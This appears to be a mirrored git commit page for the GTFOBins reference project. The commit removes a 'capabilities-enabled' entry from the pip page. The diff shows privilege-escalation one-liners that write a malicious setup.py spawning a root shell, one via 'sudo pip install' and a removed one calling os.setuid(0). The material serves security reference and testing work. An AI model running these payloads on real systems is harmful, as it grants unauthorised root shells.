mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Remove capabilities-enabled from pip
This commit is contained in:
parent
a156e10996
commit
9514d41a80
@ -70,9 +70,4 @@ functions:
|
|||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||||
sudo pip install $TF
|
sudo pip install $TF
|
||||||
capabilities-enabled:
|
|
||||||
- code: |
|
|
||||||
TF=$(mktemp -d)
|
|
||||||
echo "import os; os.setuid(0); os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
|
||||||
./easy_install
|
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user